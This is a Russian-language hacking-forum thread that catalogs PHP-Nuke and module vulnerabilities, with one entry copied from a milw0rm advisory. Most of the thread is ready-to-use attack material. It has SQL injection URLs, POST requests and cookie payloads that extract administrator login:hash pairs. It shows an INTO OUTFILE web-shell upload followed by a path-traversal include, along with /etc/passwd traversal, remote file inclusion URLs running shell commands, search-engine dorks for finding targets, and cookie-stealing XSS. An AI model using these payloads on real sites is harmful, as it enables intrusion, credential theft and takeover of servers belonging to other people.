Форум АНТИЧАТ - [ Обзор уязвимостей PHP-Nuke ]

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - [ Обзор уязвимостей PHP-Nuke ] (https://forum.antichat.xyz/showthread.php?t=59150)

myPHPNuke < 1.8.8_8rc2 (artid) SQL Injection Vulnerability

Код:

############################################################



SQL Injection vulnerability in myPHPNuke



By MustLive (http://websecurity.com.ua)



Detailed information: http://websecurity.com.ua/2398/



Description: There is SQL Injection vulnerability in printfeature.php in

myPHPNuke.



SQL Injection:



http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1



With this query you will receive login and password (hash) of administrator.



Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the

additional filters were added, so it is not vulnerable to this attack. But

version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL

Injection attack is possible (without using spaces and brackets).



############################################################



# milw0rm.com [2008-09-02]

Содрано с milw0rm.com/exploits/6347

изучал модуль Mediacatalog v3.1 в PHP Nuke 8.0

Код:

modules.php?name=Mediacatalog&pa=list_pag&cid=-1+union%0Aselect+aid,pwd+from+nuke_authors

и еще

Код:

modules.php?name=Mediacatalog&pa=Listcat&cidcat=-1+union%0Aselect+1,2,aid,3,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,pwd,24,25+from+nuke_authors--

modules.php?name=Mediacatalog&pa=Newsreliz&catnewid=-1+union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,pwd,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,aid,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+nuke_authors--

SQL-Injection PHP-Nuke <= 8.0

SQL-Injection In PHP-Nuke <= 8.0(Module Reviews)

/modules/Reviews/index.php
Фрагмент уязвимого кода:

PHP код:


		
			
$uname = filter($cookie[1], "nohtml");

    $id = intval($id);

    $score = intval($score);

    if (is_user($user)) {

        $krow = $db->sql_fetchrow($db->sql_query("SELECT karma FROM ".$user_prefix."_users WHERE username='$uname'"));

        if ($krow['karma'] == 2) {

            $db->sql_query("insert into ".$prefix."_reviews_comments_moderated values (NULL, '$id', '$uname', now(), '$comments', '$score')");

            include("header.php");

            title(""._MODERATEDTITLE."");

            OpenTable();

            echo "<center>"._COMMENTMODERATED."";

            echo "<br><br><a href=\"modules.php?name=$module_name&rop=showcontent&id=$id\">"._MODERATEDTITLE."</a>";

            CloseTable();

            include("footer.php");

            die();

        } elseif ($krow['karma'] == 3) {

            Header("Location: modules.php?name=$module_name&rop=showcontent&id=$id");

            die();

        }

    }

    $db->sql_query("insert into ".$prefix."_reviews_comments values (NULL, '$id', '$uname', now(), '$comments', '$score')");

Тут присутствуют сразу 2 sql-inj, в select и в insert запросах, после раскадировки кук, происходит слэширование данных, но в данном фрагменте кода данные из $cookie[1] попадают в ф-цию filter

PHP код:


		
			
function filter($what, $strip="", $save="", $type="") {

    if ($strip == "nohtml") {

        $what = check_html($what, $strip);

//        $what = htmlentities(trim($what), ENT_QUOTES);

        // If the variable $what doesn't comes from a preview screen should be converted

        if ($type != "preview" AND $save != 1) {

            $what = html_entity_decode($what, ENT_QUOTES);

        }

    }

    if ($save == 1) {

        $what = check_words($what);

        $what = check_html($what, $strip);

        if (!get_magic_quotes_gpc()) {

        $what = addslashes($what);

}

    } else {

        $what = stripslashes(FixQuotes($what,$strip));

        $what = check_words($what);

        $what = check_html($what, $strip);

    }

    return($what);

}

а оттуда в ф-цию check_html

PHP код:


		
			
function check_html ($str, $strip="") {

    /* The core of this code has been lifted from phpslash */

    /* which is licenced under the GPL. */

    include("config.php");

    if ($strip == "nohtml")

    $AllowableHTML=array('');

    $str = stripslashes($str);

    $str = eregi_replace("<[[:space:]]*([^>]*)[[:space:]]*>",'<\\1>', $str);

    // Delete all spaces from html tags .

    $str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?[[:space:]]*([^\" >]*)[[:space:]]*\"?[^>]*>",'<a href="\\1">', $str);

    // Delete all attribs from Anchor, except an href, double quoted.

    $str = eregi_replace("<[[:space:]]* img[[:space:]]*([^>]*)[[:space:]]*>", '', $str);

    // Delete all img tags

    $str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?javascript[[:punct:]]*\"?[^>]*>", '', $str);

    // Delete javascript code from a href tags -- Zhen-Xjell @ http://nukecops.com

    $tmp = "";

    while (ereg("<(/?[[:alpha:]]*)[[:space:]]*([^>]*)>",$str,$reg)) {

        $i = strpos($str,$reg[0]);

        $l = strlen($reg[0]);

        if ($reg[1][0] == "/") $tag = strtolower(substr($reg[1],1));

        else $tag = strtolower($reg[1]);

        if ($a = $AllowableHTML[$tag])

        if ($reg[1][0] == "/") $tag = "</$tag>";

        elseif (($a == 1) || ($reg[2] == "")) $tag = "<$tag>";

        else {

            # Place here the double quote fix function.

            $attrb_list=delQuotes($reg[2]);

            // A VER

            //$attrb_list = ereg_replace("&","&amp;",$attrb_list);

            $tag = "<$tag" . $attrb_list . ">";

        } # Attribs in tag allowed

        else $tag = "";

        $tmp .= substr($str,0,$i) . $tag;

        $str = substr($str,$i+$l);

    }

    $str = $tmp . $str;

    return $str;

    exit;

    /* Squash PHP tags unconditionally */

    $str = ereg_replace("<\?","",$str);

    return $str;

}

где экранирующие бэкслэши успешно удаляются, поэтому становится возможным внедрить наш sql код, через скулю в select данные вывести не получится, поэтому юзаем скулю в insert
Идем в
/modules.php?name=Reviews&rop=showcontent&id=1
выбираем любую рецензию, жмем "Поместить комментарий"
в куки кидаем

Код:

base64_encode(yourid:yournick',1,(select concat(aid,0x3a,pwd) from nuke_authors),3)/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)

Жмем submit, в результате мы получим login:hash админа

Зато через скулю в select при file_priv можно залить шелл, кидаем в куки:

Код:

base64_encode(yourid:yournick' union select 0x3c3f20706870696e666f28293b203f3e into outfile '/tmp/theme.php'/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)

Тут путь можно не раскрывать, лить в tmp, а затем просто проинклудить залитый шелл через templetes, для этого идем в /modules.php?name=Your_Account&op=chgtheme
правим сурс, там где написано имя темы, в моем случае value=RusNuke2003 пишем:

Код:

<option value="/../../../../../../../tmp/" >RusNuke2003

сохраняем, получаем шелл

Уязвимости модулей PHP-NUKE

Уязвимый продукт: PHP-NUKE module Pages
Версия: 1.0
Дорк: Pages © inurl:/modules.php?name=Pages

SQL-injections

Уязвимость в файле: index.php

В модуле отсутствует какая-либо защита от sql-inj, поэтому не вижу смысла приводить фрагменты уязвимого кода, уязвимы все параметры

Код:

/modules.php?name=Pages&pa=list_pag&cid=-2%0aunion+select+aid,pwd+from+nuke_authors%23

/modules.php?name=Pages&pa=showpage&pid=11'%0aunion+select+1,2,aid,pwd,5,6,7,8,9,0,11,12+from+nuke_authors%23

/modules.php?name=Pages&pa=list_pages_categories&cid=11'%0aunion+select+1,aid,pwd,4+from+nuke_authors%23

/modules.php?name=Pages&cid=11'%0aunion+select+1%23

/modules.php?name=Pages&pid=11'%0aunion+select%201,2%23

Уязвимый продукт: PHP-NUKE module video stream
Версия: 4.53
Дорк: inurl:name=Video_Stream

SQL-injections

Уязвимость в файле: watch.php

PHP код:


		
			
$id = $_GET['id'];

$request = $_GET['request'];



if($id == "request") {

    // Gets the data of request video **FOR ADMIN**

    $result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$request'");

    $row = $db->sql_fetchrow($result);

} else {

    // Check if category is adult category and requires user to accept disclaimer or if required ofr the user to be registered

    adultcategory($id);

    // Add user point for veiwing video

    userpointsVS(1);

    // adds a view to the video

    $result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$id'");

    $row = $db->sql_fetchrow($result);

    $v = $row['views'];

    $v++;

    $result = $db->sql_query("UPDATE ".$prefix."_video_stream SET views='$v' WHERE id='$id'");

    // Gets the data of that video

    $result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$id'");

    $row = $db->sql_fetchrow($result);    

}

Как видим здесь присутствуют сразу несколько sql-inj
Примеры запросов:

Код:

/modules.php?name=Video_Stream&page=watch&id=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23

/modules.php?name=Video_Stream&page=watch&id=request&request=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23

Уязвимость в файле: broken.php

PHP код:


		
			
    if($_POST['Submit']) {

        OpenTable();

        $usernameb = $_POST['username'];

        $user_emailb = $_POST['user_email'];

        $result = $db->sql_query("INSERT INTO ".$prefix."_video_stream_broken (username, email, brokenvidid) VALUES('$usernameb', '$user_emailb', '$id') ");

Пример запроса:

Код:

POST /phpnuke/modules.php?name=Video_Stream&page=broken&id=1 HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127 

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3

Keep-Alive: 300

Connection: keep-alive

Referer: http://localhost/phpnuke/modules.php?name=Video_Stream&page=broken&id=1&vidname=3

Content-Type: application/x-www-form-urlencoded

Content-Length: 90

username=',if(1=1,BENCHMARK(1559911,MD5(NOW())),1),1)/*&user_email=ad%40a.ru&Submit=Submit

Уязвимость в файле: search.php
В этом модуле присуствуют сразу несколько sql-inj

Примеры запросов:
1. /phpnuke/modules.php?name=Video_Stream&page=search
в поле search:

Код:

44' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16/*

Код:

POST /phpnuke/modules.php?name=Video_Stream&page=search HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127 

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Keep-Alive: 300

Connection: keep-alive

Referer: http://localhost/phpnuke/modules.php?name=Video_Stream&page=search

Content-Type: application/x-www-form-urlencoded

Content-Length: 138

PHPSESSID=1960d2f98b8657b6e5bdf140c2f8c8ec&orderby=0&categoryby=31' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16%23&sortvids=Sort

Уязвимость в файле: comment.php

PHP код:


		
			
$commenttopost = $_POST['comment'];

                // Check if no comment

                if($commenttopost == "") {

                    die(""._NOCOMMENTENT."");

                }

                $date = date("h:i A dS M Y");

    

                $username = $looker;

    

                // Strips out HTML and Censored Words

                filter_text($commenttopost, 'nohtml');

                // **********************************

                userpointsVS(2);

                $result = $db->sql_query("INSERT INTO ".$prefix."_video_stream_comments (vidid, user, date, comment) VALUES ('$id', '$username', '$date', '$EditedMessage') ");

в куки кидаем:

Код:

id=СУЩЕСТВУЮЩИЙ_ID', 'admin', '12:02 AM 15th Dec 2008',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1))/*

В результате получим комментарий содержащий aid:hash администратора

Уязвимый продукт: PHP-NUKE module auktion
Версия: 2.0
Дорк: inurl:modules.php?name=auktion

SQL-injections

В модуле отсутствует какая-либо защита от sql-inj, уязвимости присуствуют почти во всех файлах

Примеры запросов:

Код:

/modules.php?name=auktion&file=viewitem&item=4%0aunion+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21

/modules.php?name=auktion&file=catlist&catid=29'%0aunion+select+1,2,3,4,5,6,7%23

/modules.php?name=auktion&file=searchit&query='%0aunion+select+1,2,3,4,5,6,7/*

/modules.php?name=auktion&file=edititem&item=-3'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23

Код:

POST /modules.php?name=auktion&file=edititem HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127

Keep-Alive: 300

Connection: keep-alive

Referer: http://localhost/nuke81/modules.php?name=auktion&file=edititem&item=3

Cookie: lang=english; admin=YWRtaW46OTZlNzkyMTg5NjVlYjcyYzkyYTU0OWRkNWEzMzAxMTI6; user=MjphZG1pbjo5NmU3OTIxODk2NWViNzJjOTJhNTQ5ZGQ1YTMzMDExMjoxMDo6MDowOjA6MDo6NDA5Ng%3D%3D; 

Content-Type: application/x-www-form-urlencoded

Content-Length: 105

name=auktion&file=update&item=3&desc=4',title=(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1)/*

Уязвимый продукт: PHP-NUKE module NukeJokes
Версия: 2.2
Дорк: inurl:modules.php?name=NukeJokes

SQL-injections

Уязвимость в файле: index.php

PHP код:


		
			
function CatView($cat, $page){

...

   $result = sql_query("SELECT jokecid, catname FROM ".$prefix."_jokes_categories WHERE jokecid='$cat'", $dbi);

Данные из параметра cat попадают в запрос без каких либо преобразований
Пример запроса:

Код:

/modules.php?name=NukeJokes&func=CatView&cat=-7'%0aunion+select+1,2%23

PHP код:


		
			
function JokeView($jokeid){

...

   $result = sql_query("SELECT author, name, date, cat, joke, hits, ratingtot, ratings FROM ".$prefix."_jokes WHERE jokeid='$jokeid'", $dbi);

Данные из параметра jokeid попадают в запрос без каких либо преобразований
Пример запроса:

Код:

/modules.php?name=NukeJokes&func=JokeView&jokeid=-1'%0aunion+select+1,2,3,4,5,6,7,8%23

Уязвимость в файле: send.php

PHP код:


		
			
 function send($jokeid, $sendername, $senderemail, $toname, $toemail){

    global $sitename, $nukeurl, $prefix, $dbi, $module_name, $stop;

    include("header.php");

    include("config.php");

    checkemail($toemail);

    if (!$stop) {

    $result = sql_query("SELECT name from ".$prefix."_jokes where jokeid='$jokeid'", $dbi);

    list($name) = sql_fetch_row($result, $dbi);

    $subject = ""._SUBJECT." $sitename";

    $message = ""._HELLO." $toname:\n\n"._YOURFRIEND." $sendername "._CONSIDERED."\n\n\n$name\n\n"._URL.": $nukeurl/modules.php?name=$module_name&func=JokeView&jokeid=$jokeid\n\n"._YOUCANREAD." $sitename\n$nukeurl";

    $toemail = str_replace(" ","",$toemail);

       mail($toemail, $subject, $message, "From: \"$sendername\" <$senderemail>\nX-Mailer: PHP/" . phpversion());

Уязвимость в параметре jokeid, т.к данные из столбца name отправляются на email, при таком запросе:

Код:

POST /modules.php HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127

Keep-Alive: 300

Connection: keep-alive

Referer: http://localhost/modules.php?name=NukeJokes&file=send&jokeid=1608

Cookie: TRACKID=7b45bd0b2a560da542a5eb4fc22512c6; lang=english

Content-Type: application/x-www-form-urlencoded

Content-Length: 181

name=NukeJokes&file=send&func=send&jokeid=-1'/**/union select concat(aid,0x3a,pwd) from nuke_authors limit 0,1/*&sendername=aaa&senderemail=aaa%40mail.ru&toname=bbb&toemail=aaa%40mail.ru

Мы получим aid:hash администратора на указаное нами мыло

Уязвимость в файле: search.php

PHP код:


		
			
function search($q, $cat){

 global $module_name, $prefix, $bgcolor1, $bgcolor2, $dbi, $prefix;

include("header.php");

if($cat==0){

$cats = " ";

}else{

$cats = " cat=".$cat." AND ";

}



ModuleSearch();

...

  $search = sql_query("SELECT jokeid, author, date, name, cat, hits, ratings FROM ".$prefix."_jokes WHERE".$cats."(name LIKE '%$q%' OR joke LIKE '%$q%')", $dbi);

Уязвимость в параметрах cat и q
Пример запроса:

Код:

/modules.php?name=NukeJokes&file=search&func=search&q=x&cat=7%0aunion+select+1,2,3,4,5,6,7%23

Уязвимость в файле: comments.php

PHP код:


		
			
function JokesAddCom($jokeid, $author, $comment){

   global $prefix, $dbi, $bgcolor1, $module_name, $bgcolor2;

    $author = FixQuotes(nl2br(filter_text($author)));

    $comment = FixQuotes(nl2br(filter_text($comment)));

   sql_query("INSERT into ".$prefix."_jokes_comments VALUES(NULL, '$author' ,'$comment' , '$jokeid')", $dbi);

в ф-ции, filter_text удаляются хтмл тэги, затем данные попадают в ф-цию FixQuotes

PHP код:


		
			
function FixQuotes ($what = "") {

    while (stristr($what, "\\\\'")) {

        $what = str_replace("\\\\'","'",$what);

    }

    return $what;

}

Для чего здесь была использована эта ф-ция непонятно, при magic_quotes_gpc=off мы без труда можем внедрить наш sql код, для этого
выбираем любую шутку, жмем добавить комментарий, в куки кидаем:

Код:

author=aa',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1),Существующий_ID)/*

в результате получим aid:hash админа

В модулях:

Код:

http://site/modules.php?name=Search&type=comments&query=not123 exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

http://www.strona.pl/modules.php?name=Search&file=../../../../../../ ../../../etc/passwd%008

Код:

http://site/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../../../../etc/passwd

Код:

http://site/modules.php?name=Private_Messages&file=index&folde r=inbox&mode=read&p=1&user=eDpmb28nIFVOSU9OIFNFTEV DVCAyLG51bGwsMSwxLG51bGwvKjox

Код:

http://site/modules.php?name=Web_Links&l_op=viewlink&cid=2%20U NION%20select%20counter,%20pwd,%20aid%20FROM%20nuk e_authors%20--

Код:

http://site/modules.php?name=Reviews&rop=savecomment&id=1& amp;uname=f00bar&score=999999999999999999999999

Код:

http://site/modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%2 0nuke_authors%20--

Код:

http://site/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*

В галерии:

Код:

http://site/modules/My_eGallery/public/displayCategory.php?basepath=yourshell.txt?&cmd=un ame -a;id;pwd

Код:



http://site/modules/4nAlbum/public/displayCategory.php?basepath=yourshell.txt?&cmd=un ame -a;id;pwd

Код:

http://site/modules/coppermine/upload.php?basepath=yourshell.txt?&cmd=uname%20-a;id;pwd

Код:

http://site/modules/coppermine/themes/default/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd

Код:

http://site/modules/coppermine/include/init.inc.php?CPG_M_DIR=yourshell.txt?&cmd=uname -a;id;pwd

Код:

http://site/modules/coppermine/themes/maze/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd

Код:

http://site/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd

Код:

http://site/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=yourshell.txt?&c md=uname%20-a;id

Инклуды:

Код:

http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=shell?

http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=shell?

XSS

Версии:

Код:

PHP-Nuke 7.3

 PHP-Nuke 7.2

 PHP-Nuke 7.1

 PHP-Nuke 7.0 FINAL

 PHP-Nuke 7.0

 PHP-Nuke 6.9

 PHP-Nuke 6.7

 PHP-Nuke 6.6

 PHP-Nuke 6.5 RC3

 PHP-Nuke 6.5 RC2

 PHP-Nuke 6.5 RC1

 PHP-Nuke 6.5 FINAL

 PHP-Nuke 6.5 BETA 1

 PHP-Nuke 6.5

 PHP-Nuke 6.0

Код:

http://www.example.com/modules.php?name=News&file=article&sid=1&optionbox=[xsscode here]

http://www.example.com/modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=[xss

code here]

http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=[xss

code here]&month=05&month_l=May

http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=[xss

code here]&month_l=May

http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=[xss

code here]

http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=[xss

code here]&order=0&thold=0

http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=[xss

code here]&thold=0

http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=[xss

code here]

http://www.example.com/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script>